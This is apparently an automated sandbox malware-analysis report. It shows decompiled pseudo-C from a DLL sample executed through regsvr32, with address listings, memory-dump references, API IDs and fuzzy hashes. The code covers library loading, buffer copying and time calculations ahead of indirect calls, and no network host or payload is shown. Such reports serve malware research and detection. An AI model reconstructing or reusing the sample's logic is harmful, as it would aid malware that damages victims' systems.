					_t37 = LoadLibraryW( *0x1001e784);
					 *0x1001e77c = _t37;
					if(_t37 == 0) {
						_t38 = 0;
					} else {
						_push(_t37);
						_t60 = 0x28;
						_t38 = E1000E171(0x1001bb48, _t60);
					}
					 *0x1001e780 = _t38;
					E1000861A( &_v12, 0xfffffffe);
					memset( &_v140, 0, 0x80);
					if( *0x1001e780 != 0) {
						goto L10;
					} else {
						E1000861A(0x1001e784, 0xfffffffe);
						goto L8;
					}
				} else {
					L8:
					if( *0x1001e780 == 0) {
						_t46 =  *0x1001e6bc; // 0x2e0fbc8
						 *0x1001e780 = _t46;
					}
					L10:
					return 1;
				}
			}


























                            0x1000c4ce
                            0x1000c4ce
                            0x1000c4ce
                            0x1000c4d1
                            0x1000c4dd
                            0x1000c4e8
                            0x1000c504
                            0x1000c509
                            0x1000c512
                            0x1000c514
                            0x1000c51c
                            0x1000c53d
                            0x1000c542
                            0x1000c54f
                            0x1000c55a
                            0x1000c561
                            0x1000c568
                            0x1000c579
                            0x1000c57f
                            0x1000c582
                            0x1000c599
                            0x1000c5a5
                            0x1000c5ad
                            0x1000c5b4
                            0x1000c5ba
                            0x1000c5c6
                            0x1000c5cc
                            0x1000c5d3
                            0x1000c5e6
                            0x1000c5d5
                            0x1000c5d5
                            0x1000c5d8
                            0x1000c5de
                            0x1000c5e3
                            0x1000c5e8
                            0x1000c5f3
                            0x1000c605
                            0x1000c617
                            0x00000000
                            0x1000c619
                            0x1000c620
                            0x00000000
                            0x1000c626
                            0x1000c627
                            0x1000c627
                            0x1000c62e
                            0x1000c630
                            0x1000c635
                            0x1000c635
                            0x1000c63a
                            0x1000c63e
                            0x1000c63e

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.610943996.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                            • Associated: 00000006.00000002.610930393.0000000010000000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_10000000_regsvr32.jbxd
                            Yara matches
                            Similarity
                            • API ID: LibraryLoadmemset
                            • String ID: %08x$dll
                            • API String ID: 3406617148-2963171978
                            • Opcode ID: 43948bddfd1750ecd2ded6eac0453c4b4ed6b088884f12521d2ac14b5d2ae194
                            • Instruction ID: 605655cd81f1f69b7fa92b991eeeb1d6cfabf96bce0b9214bc1f1ebdb38bd664
                            • Opcode Fuzzy Hash: 43948bddfd1750ecd2ded6eac0453c4b4ed6b088884f12521d2ac14b5d2ae194
                            • Instruction Fuzzy Hash: 3331E3B2904358ABFB10CBA4DC89F9E33ECEB58394F408029F105E7191EB35EE818724
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 10012D70, Relevance: 6.6, APIs: 5, Instructions: 341COMMON
                            Download Yara Rule
                            C-Code - Quality: 99%
                            			E10012D70(int _a4, signed int _a8) {
				int _v8;
				intOrPtr _v12;
				signed int _v16;
				void* __esi;
				void* _t137;
				signed int _t141;
				intOrPtr* _t142;
				signed int _t145;
				signed int _t146;
				intOrPtr _t151;
				intOrPtr _t161;
				intOrPtr _t162;
				intOrPtr _t167;
				intOrPtr _t170;
				signed int _t172;
				intOrPtr _t173;
				int _t184;
				intOrPtr _t185;
				intOrPtr _t188;
				signed int _t189;
				void* _t195;
				int _t202;
				int _t208;
				intOrPtr _t217;
				signed int _t218;
				int _t219;
				intOrPtr _t220;
				signed int _t221;
				signed int _t222;
				int _t224;
				int _t225;
				signed int _t227;
				intOrPtr _t228;
				int _t232;
				int _t234;
				signed int _t235;
				int _t239;
				void* _t240;
				int _t245;
				int _t252;
				signed int _t253;
				int _t254;
				void* _t257;
				void* _t258;
				int _t259;
				intOrPtr _t260;
				int _t261;
				signed int _t269;
				signed int _t271;
				intOrPtr* _t272;
				void* _t273;

				_t253 = _a8;
				_t272 = _a4;
				_t3 = _t272 + 0xc; // 0x452bf84d
				_t4 = _t272 + 0x2c; // 0x8df075ff
				_t228 =  *_t4;
				_t137 =  *_t3 + 0xfffffffb;
				_t229 =  <=  ? _t137 : _t228;
				_v16 =  <=  ? _t137 : _t228;
				_t269 = 0;
				_a4 =  *((intOrPtr*)( *_t272 + 4));
				asm("o16 nop [eax+eax]");
				while(1) {
					_t8 = _t272 + 0x16bc; // 0x8b3c7e89
					_t141 =  *_t8 + 0x2a >> 3;
					_v12 = 0xffff;
					_t217 =  *((intOrPtr*)( *_t272 + 0x10));
					if(_t217 < _t141) {
						break;
					}
					_t11 = _t272 + 0x6c; // 0xa1ec8b55
					_t12 = _t272 + 0x5c; // 0x84e85000
					_t245 =  *_t11 -  *_t12;
					_v8 = _t245;
					_t195 =  *((intOrPtr*)( *_t272 + 4)) + _t245;
					_t247 =  <  ? _t195 : _v12;
					_t227 =  <=  ?  <  ? _t195 : _v12 : _t217 - _t141;
					if(_t227 >= _v16) {
						L7:
						if(_t253 != 4) {
							L10:
							_t269 = 0;
							__eflags = 0;
						} else {
							_t285 = _t227 - _t195;
							if(_t227 != _t195) {
								goto L10;
							} else {
								_t269 = _t253 - 3;
							}
						}
						E10015D90(_t272, _t272, 0, 0, _t269);
						_t18 = _t272 + 0x14; // 0xc703f045
						_t19 = _t272 + 8; // 0x8d000040
						 *( *_t18 +  *_t19 - 4) = _t227;
						_t22 = _t272 + 0x14; // 0xc703f045
						_t23 = _t272 + 8; // 0x8d000040
						 *((char*)( *_t22 +  *_t23 - 3)) = _t227 >> 8;
						_t26 = _t272 + 0x14; // 0xc703f045
						_t27 = _t272 + 8; // 0x8d000040
						 *( *_t26 +  *_t27 - 2) =  !_t227;
						_t30 = _t272 + 0x14; // 0xc703f045
						_t31 = _t272 + 8; // 0x8d000040
						 *((char*)( *_t30 +  *_t31 - 1)) =  !_t227 >> 8;
						E10014AF0(_t285,  *_t272);
						_t202 = _v8;
						_t273 = _t273 + 0x14;
						if(_t202 != 0) {
							_t208 =  >  ? _t227 : _t202;
							_v8 = _t208;
							_t36 = _t272 + 0x38; // 0xf47d8bff
							_t37 = _t272 + 0x5c; // 0x84e85000
							memcpy( *( *_t272 + 0xc),  *_t36 +  *_t37, _t208);
							_t273 = _t273 + 0xc;
							_t252 = _v8;
							 *( *_t272 + 0xc) =  *( *_t272 + 0xc) + _t252;
							 *((intOrPtr*)( *_t272 + 0x10)) =  *((intOrPtr*)( *_t272 + 0x10)) - _t252;
							 *((intOrPtr*)( *_t272 + 0x14)) =  *((intOrPtr*)( *_t272 + 0x14)) + _t252;
							 *(_t272 + 0x5c) =  *(_t272 + 0x5c) + _t252;
							_t227 = _t227 - _t252;
						}
						if(_t227 != 0) {
							E10014C30( *_t272,  *( *_t272 + 0xc), _t227);
							_t273 = _t273 + 0xc;
							 *( *_t272 + 0xc) =  *( *_t272 + 0xc) + _t227;
							 *((intOrPtr*)( *_t272 + 0x10)) =  *((intOrPtr*)( *_t272 + 0x10)) - _t227;
							 *((intOrPtr*)( *_t272 + 0x14)) =  *((intOrPtr*)( *_t272 + 0x14)) + _t227;
						}
						_t253 = _a8;
						if(_t269 == 0) {
							continue;
						}
					} else {
						if(_t227 != 0 || _t253 == 4) {
							if(_t253 != 0 && _t227 == _t195) {
								goto L7;
							}
						}
					}
					break;
				}
				_t142 =  *_t272;
				_t232 = _a4 -  *((intOrPtr*)(_t142 + 4));
				_a4 = _t232;
				if(_t232 == 0) {
					_t83 = _t272 + 0x6c; // 0xa1ec8b55
					_t254 =  *_t83;
				} else {
					_t59 = _t272 + 0x2c; // 0x8df075ff
					_t224 =  *_t59;
					if(_t232 < _t224) {
						_t65 = _t272 + 0x3c; // 0x830cc483
						_t66 = _t272 + 0x6c; // 0xa1ec8b55
						_t260 =  *_t66;
						__eflags =  *_t65 - _t260 - _t232;
						if( *_t65 - _t260 <= _t232) {
							_t67 = _t272 + 0x38; // 0xf47d8bff
							_t261 = _t260 - _t224;
							 *(_t272 + 0x6c) = _t261;
							memcpy( *_t67,  *_t67 + _t224, _t261);
							_t70 = _t272 + 0x16b0; // 0xdf750008
							_t188 =  *_t70;
							_t273 = _t273 + 0xc;
							_t232 = _a4;
							__eflags = _t188 - 2;
							if(_t188 < 2) {
								_t189 = _t188 + 1;
								__eflags = _t189;
								 *(_t272 + 0x16b0) = _t189;
							}
						}
						_t73 = _t272 + 0x38; // 0xf47d8bff
						_t74 = _t272 + 0x6c; // 0xa1ec8b55
						memcpy( *_t73 +  *_t74,  *((intOrPtr*)( *_t272)) - _t232, _t232);
						_t225 = _a4;
						_t273 = _t273 + 0xc;
						_t76 = _t272 + 0x6c;
						 *_t76 =  *(_t272 + 0x6c) + _t225;
						__eflags =  *_t76;
						_t78 = _t272 + 0x6c; // 0xa1ec8b55
						_t184 =  *_t78;
						_t79 = _t272 + 0x2c; // 0x8df075ff
						_t239 =  *_t79;
					} else {
						 *(_t272 + 0x16b0) = 2;
						_t61 = _t272 + 0x38; // 0xf47d8bff
						memcpy( *_t61,  *_t142 - _t224, _t224);
						_t62 = _t272 + 0x2c; // 0x8df075ff
						_t184 =  *_t62;
						_t273 = _t273 + 0xc;
						_t225 = _a4;
						_t239 = _t184;
						 *(_t272 + 0x6c) = _t184;
					}
					_t254 = _t184;
					 *(_t272 + 0x5c) = _t184;
					_t81 = _t272 + 0x16b4; // 0xe9ffcb83
					_t185 =  *_t81;
					_t240 = _t239 - _t185;
					_t241 =  <=  ? _t225 : _t240;
					_t242 = ( <=  ? _t225 : _t240) + _t185;
					 *((intOrPtr*)(_t272 + 0x16b4)) = ( <=  ? _t225 : _t240) + _t185;
				}
				if( *(_t272 + 0x16c0) < _t254) {
					 *(_t272 + 0x16c0) = _t254;
				}
				if(_t269 == 0) {
					_t218 = _a8;
					__eflags = _t218;
					if(_t218 == 0) {
						L34:
						_t89 = _t272 + 0x3c; // 0x830cc483
						_t219 =  *_t272;
						_t145 =  *_t89 - _t254 - 1;
						_a4 =  *_t272;
						_t234 = _t254;
						_v16 = _t145;
						_v8 = _t254;
						__eflags =  *((intOrPtr*)(_t219 + 4)) - _t145;
						if( *((intOrPtr*)(_t219 + 4)) > _t145) {
							_v8 = _t254;
							_t95 = _t272 + 0x5c; // 0x84e85000
							_a4 = _t219;
							_t234 = _t254;
							_t97 = _t272 + 0x2c; // 0x8df075ff
							__eflags =  *_t95 -  *_t97;
							if( *_t95 >=  *_t97) {
								_t98 = _t272 + 0x2c; // 0x8df075ff
								_t167 =  *_t98;
								_t259 = _t254 - _t167;
								_t99 = _t272 + 0x38; // 0xf47d8bff
								 *(_t272 + 0x5c) =  *(_t272 + 0x5c) - _t167;
								 *(_t272 + 0x6c) = _t259;
								memcpy( *_t99, _t167 +  *_t99, _t259);
								_t103 = _t272 + 0x16b0; // 0xdf750008
								_t170 =  *_t103;
								_t273 = _t273 + 0xc;
								__eflags = _t170 - 2;
								if(_t170 < 2) {
									_t172 = _t170 + 1;
									__eflags = _t172;
									 *(_t272 + 0x16b0) = _t172;
								}
								_t106 = _t272 + 0x2c; // 0x8df075ff
								_t145 = _v16 +  *_t106;
								__eflags = _t145;
								_a4 =  *_t272;
								_t108 = _t272 + 0x6c; // 0xa1ec8b55
								_t234 =  *_t108;
								_v8 = _t234;
							}
						}
						_t255 = _a4;
						_t220 =  *((intOrPtr*)(_a4 + 4));
						__eflags = _t145 - _t220;
						_t221 =  <=  ? _t145 : _t220;
						_t146 = _t221;
						_a4 = _t221;
						_t222 = _a8;
						__eflags = _t146;
						if(_t146 != 0) {
							_t114 = _t272 + 0x38; // 0xf47d8bff
							E10014C30(_t255,  *_t114 + _v8, _t146);
							_t273 = _t273 + 0xc;
							_t117 = _t272 + 0x6c;
							 *_t117 =  *(_t272 + 0x6c) + _a4;
							__eflags =  *_t117;
							_t119 = _t272 + 0x6c; // 0xa1ec8b55
							_t234 =  *_t119;
						}
						__eflags =  *(_t272 + 0x16c0) - _t234;
						if( *(_t272 + 0x16c0) < _t234) {
							 *(_t272 + 0x16c0) = _t234;
						}
						_t122 = _t272 + 0x16bc; // 0x8b3c7e89
						_t123 = _t272 + 0xc; // 0x452bf84d
						_t257 =  *_t123 - ( *_t122 + 0x2a >> 3);
						__eflags = _t257 - 0xffff;
						_t258 =  >  ? 0xffff : _t257;
						_t124 = _t272 + 0x2c; // 0x8df075ff
						_t151 =  *_t124;
						_t125 = _t272 + 0x5c; // 0x84e85000
						_t235 = _t234 -  *_t125;
						__eflags = _t258 - _t151;
						_t152 =  <=  ? _t258 : _t151;
						__eflags = _t235 - ( <=  ? _t258 : _t151);
						if(_t235 >= ( <=  ? _t258 : _t151)) {
							L49:
							__eflags = _t235 - _t258;
							_t154 =  >  ? _t258 : _t235;
							_a4 =  >  ? _t258 : _t235;
							__eflags = _t222 - 4;
							if(_t222 != 4) {
								L53:
								_t269 = 0;
								__eflags = 0;
							} else {
								_t161 =  *_t272;
								__eflags =  *(_t161 + 4);
								_t154 = _a4;
								if( *(_t161 + 4) != 0) {
									goto L53;
								} else {
									__eflags = _t154 - _t235;
									if(_t154 != _t235) {
										goto L53;
									} else {
										_t269 = _t222 - 3;
									}
								}
							}
							_t131 = _t272 + 0x38; // 0xf47d8bff
							_t132 = _t272 + 0x5c; // 0x84e85000
							E10015D90(_t272, _t272,  *_t131 +  *_t132, _t154, _t269);
							_t134 = _t272 + 0x5c;
							 *_t134 =  *(_t272 + 0x5c) + _a4;
							__eflags =  *_t134;
							E10014AF0( *_t134,  *_t272);
						} else {
							__eflags = _t235;
							if(_t235 != 0) {
								L46:
								__eflags = _t222;
								if(_t222 != 0) {
									_t162 =  *_t272;
									__eflags =  *(_t162 + 4);
									if( *(_t162 + 4) == 0) {
										__eflags = _t235 - _t258;
										if(_t235 <= _t258) {
											goto L49;
										}
									}
								}
							} else {
								__eflags = _t222 - 4;
								if(_t222 == 4) {
									goto L46;
								}
							}
						}
						asm("sbb edi, edi");
						_t271 =  ~_t269 & 0x00000002;
						__eflags = _t271;
						return _t271;
					} else {
						__eflags = _t218 - 4;
						if(_t218 == 4) {
							goto L34;
						} else {
							_t173 =  *_t272;
							__eflags =  *(_t173 + 4);
							if( *(_t173 + 4) != 0) {
								goto L34;
							} else {
								_t88 = _t272 + 0x5c; // 0x84e85000
								__eflags = _t254 -  *_t88;
								if(_t254 !=  *_t88) {
									goto L34;
								} else {
									return 1;
								}
							}
						}
					}
				} else {
					return 3;
				}
			}






















































                            0x10012d76
                            0x10012d7b
                            0x10012d7f
                            0x10012d82
                            0x10012d82
                            0x10012d85
                            0x10012d8a
                            0x10012d8f
                            0x10012d92
                            0x10012d97
                            0x10012d9a
                            0x10012da0
                            0x10012da0
                            0x10012dab
                            0x10012dae
                            0x10012db5
                            0x10012dba
                            0x00000000
                            0x00000000
                            0x10012dc0
                            0x10012dc5
                            0x10012dc5
                            0x10012dca
                            0x10012dd0
                            0x10012dda
                            0x10012ddf
                            0x10012de5
                            0x10012e04
                            0x10012e07
                            0x10012e12
                            0x10012e12
                            0x10012e12
                            0x10012e09
                            0x10012e09
                            0x10012e0b
                            0x00000000
                            0x10012e0d
                            0x10012e0d
                            0x10012e0d
                            0x10012e0b
                            0x10012e1a
                            0x10012e1f
                            0x10012e24
                            0x10012e2a
                            0x10012e2e
                            0x10012e31
                            0x10012e34
                            0x10012e3a
                            0x10012e3f
                            0x10012e42
                            0x10012e48
                            0x10012e4d
                            0x10012e53
                            0x10012e59
                            0x10012e5e
                            0x10012e61
                            0x10012e66
                            0x10012e6a
                            0x10012e6e
                            0x10012e71
                            0x10012e74
                            0x10012e7d
                            0x10012e84
                            0x10012e87
                            0x10012e8a
                            0x10012e8f
                            0x10012e94
                            0x10012e97
                            0x10012e9a
                            0x10012e9a
                            0x10012e9e
                            0x10012ea7
                            0x10012eae
                            0x10012eb1
                            0x10012eb6
                            0x10012ebb
                            0x10012ebb
                            0x10012ebe
                            0x10012ec3
                            0x00000000
                            0x00000000
                            0x10012de7
                            0x10012de9
                            0x10012df6
                            0x00000000
                            0x00000000
                            0x10012df6
                            0x10012de9
                            0x00000000
                            0x10012de5
                            0x10012ec9
                            0x10012ece
                            0x10012ed1
                            0x10012ed4
                            0x10012f7f
                            0x10012f7f
                            0x10012eda
                            0x10012eda
                            0x10012eda
                            0x10012edf
                            0x10012f09
                            0x10012f0c
                            0x10012f0c
                            0x10012f11
                            0x10012f13
                            0x10012f15
                            0x10012f18
                            0x10012f1b
                            0x10012f23
                            0x10012f28
                            0x10012f28
                            0x10012f2e
                            0x10012f31
                            0x10012f34
                            0x10012f37
                            0x10012f39
                            0x10012f39
                            0x10012f3a
                            0x10012f3a
                            0x10012f37
                            0x10012f48
                            0x10012f4b
                            0x10012f4f
                            0x10012f54
                            0x10012f57
                            0x10012f5a
                            0x10012f5a
                            0x10012f5a
                            0x10012f5d
                            0x10012f5d
                            0x10012f60
                            0x10012f60
                            0x10012ee1
                            0x10012ee1
                            0x10012ef1
                            0x10012ef4
                            0x10012ef9
                            0x10012ef9
                            0x10012efc
                            0x10012eff
                            0x10012f02
                            0x10012f04
                            0x10012f04
                            0x10012f63
                            0x10012f65
                            0x10012f68
                            0x10012f68
                            0x10012f6e
                            0x10012f72
                            0x10012f75
                            0x10012f77
                            0x10012f77
                            0x10012f88
                            0x10012f8a
                            0x10012f8a
                            0x10012f92
                            0x10012fa0
                            0x10012fa3
                            0x10012fa5
                            0x10012fc5
                            0x10012fc5
                            0x10012fc8
                            0x10012fce
                            0x10012fcf
                            0x10012fd2
                            0x10012fd4
                            0x10012fd7
                            0x10012fda
                            0x10012fdd
                            0x10012fe1
                            0x10012fe4
                            0x10012fe7
                            0x10012fea
                            0x10012fec
                            0x10012fec
                            0x10012fef
                            0x10012ff1
                            0x10012ff1
                            0x10012ff4
                            0x10012ff6
                            0x10012ff9
                            0x10013001
                            0x10013004
                            0x10013009
                            0x10013009
                            0x1001300f
                            0x10013012
                            0x10013015
                            0x10013017
                            0x10013017
                            0x10013018
                            0x10013018
                            0x10013023
                            0x10013023
                            0x10013023
                            0x10013026
                            0x10013029
                            0x10013029
                            0x1001302c
                            0x1001302c
                            0x10012fef
                            0x1001302f
                            0x10013032
                            0x10013035
                            0x10013037
                            0x1001303a
                            0x1001303c
                            0x1001303f
                            0x10013042
                            0x10013044
                            0x10013047
                            0x1001304f
                            0x10013057
                            0x1001305a
                            0x1001305a
                            0x1001305a
                            0x1001305d
                            0x1001305d
                            0x1001305d
                            0x10013060
                            0x10013066
                            0x10013068
                            0x10013068
                            0x1001306e
                            0x10013074
                            0x1001307d
                            0x10013084
                            0x10013086
                            0x10013089
                            0x10013089
                            0x1001308c
                            0x1001308c
                            0x1001308f
                            0x10013091
                            0x10013094
                            0x10013096
                            0x100130b1
                            0x100130b1
                            0x100130b5
                            0x100130b8
                            0x100130bb
                            0x100130be
                            0x100130d4
                            0x100130d4
                            0x100130d4
                            0x100130c0
                            0x100130c0
                            0x100130c2
                            0x100130c6
                            0x100130c9
                            0x00000000
                            0x100130cb
                            0x100130cb
                            0x100130cd
                            0x00000000
                            0x100130cf
                            0x100130cf
                            0x100130cf
                            0x100130cd
                            0x100130c9
                            0x100130d8
                            0x100130db
                            0x100130e0
                            0x100130ea
                            0x100130ea
                            0x100130ea
                            0x100130ed
                            0x10013098
                            0x10013098
                            0x1001309a
                            0x100130a1
                            0x100130a1
                            0x100130a3
                            0x100130a5
                            0x100130a7
                            0x100130ab
                            0x100130ad
                            0x100130af
                            0x00000000
                            0x00000000
                            0x100130af
                            0x100130ab
                            0x1001309c
                            0x1001309c
                            0x1001309f
                            0x00000000
                            0x00000000
                            0x1001309f
                            0x1001309a
                            0x100130f7
                            0x100130f9
                            0x100130f9
                            0x10013104
                            0x10012fa7
                            0x10012fa7
                            0x10012faa
                            0x00000000
                            0x10012fac
                            0x10012fac
                            0x10012fae
                            0x10012fb2
                            0x00000000
                            0x10012fb4
                            0x10012fb4
                            0x10012fb4
                            0x10012fb7
                            0x00000000
                            0x10012fbb
                            0x10012fc4
                            0x10012fc4
                            0x10012fb7
                            0x10012fb2
                            0x10012faa
                            0x10012f96
                            0x10012f9f
                            0x10012f9f

                            APIs
                            Memory Dump Source
                            • Source File: 00000006.00000002.610943996.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                            • Associated: 00000006.00000002.610930393.0000000010000000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_10000000_regsvr32.jbxd
                            Yara matches
                            Similarity
                            • API ID: memcpy
                            • String ID:
                            • API String ID: 3510742995-0
                            • Opcode ID: 7f7d741cb3f994d18600c39c46d11212efede5dc36165527de22fb167ca1c3df
                            • Instruction ID: 4fdc6b10e7b7168a0789f31eb0048a9ad86d4efd395f939b62a688ab4a7349d5
                            • Opcode Fuzzy Hash: 7f7d741cb3f994d18600c39c46d11212efede5dc36165527de22fb167ca1c3df
                            • Instruction Fuzzy Hash: FAD112B5600A009FCB24CF69D8D4A6AB7F1FF88344B25892DE88ACB711D771E9958B50
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 10004D6D, Relevance: 6.4, APIs: 4, Instructions: 432stringCOMMON
                            Download Yara Rule
                            C-Code - Quality: 70%
                            			E10004D6D(intOrPtr* __ecx, void* __edx, void* __fp0) {
				char _v516;
				char _v556;
				char _v564;
				char _v568;
				char _v572;
				char _v576;
				intOrPtr _v580;
				char _v588;
				signed int _v596;
				intOrPtr _v602;
				intOrPtr _v604;
				char _v608;
				CHAR* _v612;
				CHAR* _v616;
				signed int _v620;
				signed int _v624;
				signed int _v628;
				signed int _v632;
				char _v636;
				intOrPtr _t119;
				signed int _t122;
				CHAR* _t124;
				intOrPtr _t125;
				CHAR* _t127;
				WCHAR* _t130;
				intOrPtr _t133;
				intOrPtr _t137;
				WCHAR* _t138;
				intOrPtr _t142;
				WCHAR* _t143;
				CHAR* _t144;
				intOrPtr _t145;
				intOrPtr _t150;
				intOrPtr _t153;
				WCHAR* _t154;
				signed int _t159;
				WCHAR* _t160;
				intOrPtr _t163;
				intOrPtr _t165;
				intOrPtr _t166;
				intOrPtr _t170;
				signed int _t173;
				signed int _t178;
				intOrPtr _t182;
				WCHAR* _t184;
				char _t186;
				WCHAR* _t188;
				intOrPtr _t200;
				intOrPtr _t211;
				signed int _t215;
				char _t220;
				WCHAR* _t231;
				intOrPtr _t235;
				intOrPtr _t238;
				intOrPtr _t239;
				intOrPtr _t246;
				signed int _t248;
				WCHAR* _t249;
				CHAR* _t250;
				intOrPtr _t262;
				void* _t271;
				intOrPtr _t272;
				signed int _t277;
				void* _t278;
				intOrPtr _t280;
				signed int _t282;
				void* _t298;
				void* _t299;
				intOrPtr _t305;
				CHAR* _t326;
				void* _t328;
				WCHAR* _t329;
				intOrPtr _t331;
				WCHAR* _t333;
				signed int _t335;
				intOrPtr* _t337;
				void* _t338;
				void* _t339;
				void* _t353;

				_t353 = __fp0;
				_t337 = (_t335 & 0xfffffff8) - 0x26c;
				_t119 =  *0x1001e688; // 0x2d90590
				_v620 = _v620 & 0x00000000;
				_t328 = __ecx;
				if(( *(_t119 + 0x1898) & 0x00000082) == 0) {
					L7:
					_t14 = E1000B7A8(0x1001b9c8,  &_v516) + 1; // 0x1
					E1000A86D( &_v556, _t14, _t351);
					_t298 = 0x64;
					_t122 = E1000A471( &_v556, _t298);
					 *0x1001e748 = _t122;
					if(_t122 != 0) {
						_push(0x4e5);
						_t299 = 0x10;
						 *0x1001e680 = E1000E1BC(0x1001b9cc, _t299);
						 *_t337 = 0x610;
						_t124 = E100095E1(0x1001b9cc);
						_push(0);
						_push(_t124);
						_v612 = _t124;
						_t125 =  *0x1001e688; // 0x2d90590
						_t127 = E100092E5(_t125 + 0x228);
						_t338 = _t337 + 0xc;
						_v616 = _t127;
						E100085D5( &_v612);
						_t130 = E1000B269(_t127);
						_t246 = 3;
						__eflags = _t130;
						if(_t130 != 0) {
							 *((intOrPtr*)(_t328 + 0x10)) = _t239;
							 *_t328 = _t246;
						}
						E1000861A( &_v616, 0xfffffffe);
						_t133 =  *0x1001e688; // 0x2d90590
						_t22 = _t133 + 0x114; // 0x2d906a4
						E10004A0B( *((intOrPtr*)( *((intOrPtr*)(_t133 + 0x110)))), _t22, _t353, _t328, 0, 0);
						_t262 =  *0x1001e688; // 0x2d90590
						_t339 = _t338 + 0x14;
						__eflags =  *((intOrPtr*)(_t262 + 0x101c)) - _t246;
						if( *((intOrPtr*)(_t262 + 0x101c)) == _t246) {
							L17:
							asm("stosd");
							asm("stosd");
							asm("stosd");
							asm("stosd");
							asm("stosd");
							_v572 = _t328;
							_v576 =  *((intOrPtr*)(_t262 + 0x214));
							_t137 =  *0x1001e680; // 0x0
							_t138 =  *(_t137 + 8);
							__eflags = _t138;
							if(_t138 != 0) {
								 *_t138(0, 0, 1,  &_v568,  &_v564);
							}
							_v620 = _v620 & 0x00000000;
							E1000E2C6(_t353,  &_v576);
							_pop(_t262);
							_t142 =  *0x1001e6b4; // 0x2e0fc48
							_t143 =  *((intOrPtr*)(_t142 + 0x10))(0, 0,  &_v620);
							__eflags = _t143;
							if(_t143 == 0) {
								E1000E2C6(_t353,  &_v588);
								_t235 =  *0x1001e6b4; // 0x2e0fc48
								_pop(_t262);
								 *((intOrPtr*)(_t235 + 0xc))(_v632);
							}
							__eflags =  *0x1001e73c;
							if( *0x1001e73c <= 0) {
								goto L36;
							} else {
								_t165 =  *0x1001e680; // 0x0
								__eflags =  *(_t165 + 8);
								if( *(_t165 + 8) != 0) {
									_t231 =  *(_t165 + 0xc);
									__eflags = _t231;
									if(_t231 != 0) {
										 *_t231(_v580);
									}
								}
								_t166 =  *0x1001e688; // 0x2d90590
								_t262 =  *((intOrPtr*)(_t166 + 0x214));
								__eflags = _t262 - _t246;
								if(_t262 == _t246) {
									goto L36;
								} else {
									__eflags =  *((intOrPtr*)(_t166 + 4)) - 6;
									if( *((intOrPtr*)(_t166 + 4)) >= 6) {
										__eflags =  *((intOrPtr*)(_t166 + 0x101c)) - _t246;
										if( *((intOrPtr*)(_t166 + 0x101c)) == _t246) {
											E100049A5();
											asm("stosd");
											asm("stosd");
											asm("stosd");
											asm("stosd");
											_t170 =  *0x1001e684; // 0x2e0faa0
											 *((intOrPtr*)(_t170 + 0xd8))( &_v608);
											_t262 = _v602;
											_t248 = 0x3c;
											_t173 = _t262 + 0x00000002 & 0x0000ffff;
											_v596 = _t173;
											_v620 = _t173 / _t248 + _v604 & 0x0000ffff;
											_t178 = _t262 + 0x0000000e & 0x0000ffff;
											_v624 = _t178;
											_v628 = _t178 / _t248 + _v604 & 0x0000ffff;
											_t182 =  *0x1001e688; // 0x2d90590
											_t184 = E1000FC1F(_t182 + 0x228, _t178 % _t248, _t353, 0, _t182 + 0x228, 0);
											_t339 = _t339 + 0xc;
											__eflags = _t184;
											if(_t184 >= 0) {
												_t333 = E10008604(0x1000);
												_v616 = _t333;
												_pop(_t262);
												__eflags = _t333;
												if(_t333 != 0) {
													_t186 = E1000109A(_t262, 0x148);
													_t305 =  *0x1001e688; // 0x2d90590
													_v636 = _t186;
													_push(_t305 + 0x648);
													_push(0xa);
													_push(7);
													_t271 = 2;
													E1000902D(_t271,  &_v572);
													_t272 =  *0x1001e688; // 0x2d90590
													_t188 = E100060DF( &_v572, _t272 + 0x228, 1,  *((intOrPtr*)(_t272 + 0xa0)));
													_t339 = _t339 + 0x18;
													_v632 = _t188;
													__eflags = _t188;
													if(_t188 != 0) {
														_push(_v624 % _t248 & 0x0000ffff);
														_push(_v628 & 0x0000ffff);
														_push(_v596 % _t248 & 0x0000ffff);
														_push(_v620 & 0x0000ffff);
														_push(_v632);
														_push( &_v572);
														_t200 =  *0x1001e688; // 0x2d90590
														__eflags = _t200 + 0x1020;
														E10009640(_t333, 0x1000, _v636, _t200 + 0x1020);
														E100085D5( &_v636);
														E1000A911(_t333, 0, 0xbb8, 1);
														E1000861A( &_v632, 0xfffffffe);
														_t339 = _t339 + 0x44;
													}
													E1000861A( &_v616, 0xfffffffe);
													_pop(_t262);
												}
											}
										}
										goto L36;
									}
									__eflags = _t262 - 2;
									if(_t262 != 2) {
										goto L36;
									}
									E100049A5();
									asm("stosd");
									asm("stosd");
									asm("stosd");
									asm("stosd");
									_t211 =  *0x1001e684; // 0x2e0faa0
									 *((intOrPtr*)(_t211 + 0xd8))( &_v608);
									_t215 = _v602 + 0x00000002 & 0x0000ffff;
									_v628 = _t215;
									_t277 = 0x3c;
									_v632 = _t215 / _t277 + _v604 & 0x0000ffff;
									_t249 = E10008604(0x1000);
									_v624 = _t249;
									_pop(_t278);
									__eflags = _t249;
									if(_t249 != 0) {
										_t220 = E100095E1(_t278, 0x32d);
										_t280 =  *0x1001e688; // 0x2d90590
										_push(_t280 + 0x228);
										_t282 = 0x3c;
										_v636 = _t220;
										_push(_v628 % _t282 & 0x0000ffff);
										E10009640(_t249, 0x1000, _t220, _v632 & 0x0000ffff);
										E100085D5( &_v636);
										E1000A911(_t249, 0, 0xbb8, 1);
										E1000861A( &_v624, 0xfffffffe);
									}
									goto L41;
								}
							}
						} else {
							_t238 =  *((intOrPtr*)(_t262 + 0x214));
							__eflags = _t238 - _t246;
							if(_t238 == _t246) {
								goto L17;
							}
							__eflags =  *((intOrPtr*)(_t262 + 4)) - 6;
							if( *((intOrPtr*)(_t262 + 4)) >= 6) {
								L36:
								_t144 = E100095E1(_t262, 0x610);
								_push(0);
								_push(_t144);
								_v616 = _t144;
								_t145 =  *0x1001e688; // 0x2d90590
								_t329 = E100092E5(_t145 + 0x228);
								_v612 = _t329;
								__eflags = _t329;
								if(_t329 != 0) {
									_t160 = E1000B269(_t329);
									__eflags = _t160;
									if(_t160 != 0) {
										_t163 =  *0x1001e684; // 0x2e0faa0
										 *((intOrPtr*)(_t163 + 0x10c))(_t329);
									}
